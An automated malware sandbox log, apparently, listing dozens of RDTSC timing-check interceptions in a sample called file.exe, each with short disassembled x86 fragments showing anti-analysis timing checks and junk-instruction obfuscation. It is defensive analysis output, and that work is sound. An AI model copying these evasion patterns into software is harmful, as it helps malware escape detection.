              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841265 second address: 841272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FEF0C74E726h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8405FC second address: 840603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840603 second address: 84060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FEF0C74E726h 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840789 second address: 84079F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8408EE second address: 8408F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8408F2 second address: 8408F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840D96 second address: 840DC6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c jmp 00007FEF0C74E72Ch 0x00000011 jnl 00007FEF0C74E72Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FEF0C74E726h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840DC6 second address: 840DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840F44 second address: 840F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840F48 second address: 840F7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FEF0C6C7677h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8410C8 second address: 8410D8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEF0C74E72Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8410D8 second address: 8410E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEF0C6C7656h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84302F second address: 843033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843033 second address: 84305E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 jmp 00007FEF0C6C7667h 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84305E second address: 843064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843064 second address: 8430DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FEF0C6C7656h 0x00000009 jc 00007FEF0C6C7656h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 push ebx 0x00000015 jmp 00007FEF0C6C7665h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007FEF0C6C765Dh 0x00000024 pop eax 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007FEF0C6C7658h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f je 00007FEF0C6C7659h 0x00000045 movsx edi, bx 0x00000048 push 0646AF86h 0x0000004d push eax 0x0000004e push edx 0x0000004f push edi 0x00000050 ja 00007FEF0C6C7656h 0x00000056 pop edi 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8434F7 second address: 8434FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843C0B second address: 843C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8441B4 second address: 8441BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844232 second address: 844236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844236 second address: 844290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C74E735h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FEF0C74E728h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 movsx esi, bx 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FEF0C74E739h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845103 second address: 845109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8461D4 second address: 846229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007FEF0C74E72Ah 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 nop 0x00000013 jmp 00007FEF0C74E734h 0x00000018 push 00000000h 0x0000001a mov edi, dword ptr [ebp+122D39C2h] 0x00000020 push 00000000h 0x00000022 xchg eax, ebx 0x00000023 jmp 00007FEF0C74E739h 0x00000028 push eax 0x00000029 pushad 0x0000002a jo 00007FEF0C74E72Ch 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846229 second address: 846235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007FEF0C6C7656h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846235 second address: 846239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847518 second address: 84751D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84751D second address: 847523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847523 second address: 847527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8475EA second address: 8475F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848B06 second address: 848B0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8495B5 second address: 84962C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FEF0C74E726h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FEF0C74E728h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D1CCCh] 0x00000031 xor dword ptr [ebp+12478FBEh], esi 0x00000037 mov esi, dword ptr [ebp+122D3932h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007FEF0C74E728h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 00000016h 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 sub edi, 0E3BC857h 0x0000005f push 00000000h 0x00000061 mov esi, dword ptr [ebp+12477078h] 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c push ebx 0x0000006d pop ebx 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84962C second address: 849636 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEF0C6C7656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B4C0 second address: 84B4C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B4C4 second address: 84B4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B4D0 second address: 84B4EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEF0C74E734h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B4EA second address: 84B503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jl 00007FEF0C6C7656h 0x0000000e jmp 00007FEF0C6C765Ah 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B503 second address: 84B51B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEF0C74E72Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FEF0C74E726h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84CDB6 second address: 84CDBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84D355 second address: 84D35A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E2D2 second address: 84E2DC instructions: 0x00000000 rdtsc 0x00000002 js 00007FEF0C6C765Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84D4DE second address: 84D53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEF0C74E732h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007FEF0C74E72Bh 0x00000013 or edi, 2EA59BCAh 0x00000019 pop ebx 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 sbb di, 91C0h 0x0000002d mov eax, dword ptr [ebp+122D1345h] 0x00000033 mov edi, dword ptr [ebp+122D3B32h] 0x00000039 or dword ptr [ebp+122D19E8h], ecx 0x0000003f push FFFFFFFFh 0x00000041 and edi, 20A1FA0Dh 0x00000047 push eax 0x00000048 push ecx 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c pop edx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E2DC second address: 84E35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FEF0C6C7668h 0x0000000e mov ebx, 3B7585E1h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FEF0C6C7658h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D2735h] 0x00000035 call 00007FEF0C6C7667h 0x0000003a mov dword ptr [ebp+122D20C2h], ebx 0x00000040 pop ebx 0x00000041 mov ebx, 33FC6440h 0x00000046 push 00000000h 0x00000048 mov ebx, edx 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jns 00007FEF0C6C765Ch 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F370 second address: 84F37A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F37A second address: 84F3FD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEF0C6C7656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FEF0C6C7658h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 adc bx, F1B9h 0x0000002d push 00000000h 0x0000002f mov ebx, dword ptr [ebp+12478E45h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007FEF0C6C7658h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000017h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 jmp 00007FEF0C6C7668h 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 jl 00007FEF0C6C7658h 0x0000005e pushad 0x0000005f popad 0x00000060 pop eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E49B second address: 84E4A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E4A1 second address: 84E4AB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEF0C6C765Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E4AB second address: 84E537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FEF0C74E728h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 add edi, dword ptr [ebp+122D3A1Eh] 0x00000029 push dword ptr fs:[00000000h] 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov di, 7B24h 0x0000003d jmp 00007FEF0C74E72Ch 0x00000042 mov eax, dword ptr [ebp+122D05F1h] 0x00000048 pushad 0x00000049 sbb ecx, 19CEB426h 0x0000004f xor dword ptr [ebp+122D295Fh], edi 0x00000055 popad 0x00000056 push FFFFFFFFh 0x00000058 mov edi, dword ptr [ebp+122D1E60h] 0x0000005e nop 0x0000005f jmp 00007FEF0C74E733h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 js 00007FEF0C74E72Ch 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F592 second address: 84F5B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7663h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F5B0 second address: 84F5B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8516B4 second address: 8516B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F5B6 second address: 84F5BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F5BC second address: 84F649 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEF0C6C7656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov bx, cx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FEF0C6C7658h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov bx, 9F00h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c mov bx, 12CAh 0x00000040 mov eax, dword ptr [ebp+122D13CDh] 0x00000046 push 00000000h 0x00000048 push esi 0x00000049 call 00007FEF0C6C7658h 0x0000004e pop esi 0x0000004f mov dword ptr [esp+04h], esi 0x00000053 add dword ptr [esp+04h], 00000016h 0x0000005b inc esi 0x0000005c push esi 0x0000005d ret 0x0000005e pop esi 0x0000005f ret 0x00000060 push FFFFFFFFh 0x00000062 push edi 0x00000063 mov ebx, dword ptr [ebp+122D371Eh] 0x00000069 pop ebx 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jne 00007FEF0C6C7662h 0x00000073 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85278F second address: 8527A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEF0C74E733h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 851904 second address: 851909 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85298E second address: 852994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 854857 second address: 85485D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8575E0 second address: 85762B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FEF0C74E72Dh 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FEF0C74E728h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2273h], ecx 0x0000002c push 00000000h 0x0000002e or dword ptr [ebp+122D186Bh], ebx 0x00000034 push 00000000h 0x00000036 xchg eax, esi 0x00000037 je 00007FEF0C74E730h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857817 second address: 85781C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8599D2 second address: 8599F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEF0C74E738h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C73A second address: 85C76A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C7669h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FEF0C6C7658h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 je 00007FEF0C6C765Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A9AA second address: 85A9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FEF0C74E726h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C76A second address: 85C7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jo 00007FEF0C6C7656h 0x0000000b pop edi 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FEF0C6C7658h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 sbb di, 1EFAh 0x0000002d mov dword ptr [ebp+124770FCh], ebx 0x00000033 push 00000000h 0x00000035 mov ebx, dword ptr [ebp+122D1F13h] 0x0000003b push 00000000h 0x0000003d mov edi, 04DE98FCh 0x00000042 push eax 0x00000043 push esi 0x00000044 pushad 0x00000045 jnp 00007FEF0C6C7656h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B83C second address: 85B842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B842 second address: 85B848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B848 second address: 85B861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEF0C74E72Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B861 second address: 85B865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85A9BE second address: 85A9C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B865 second address: 85B86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B86F second address: 85B873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806D0C second address: 806D1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEF0C6C765Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806D1D second address: 806D34 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FEF0C74E732h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86442C second address: 864430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866428 second address: 866444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FEF0C74E726h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007FEF0C74E726h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 866444 second address: 866449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
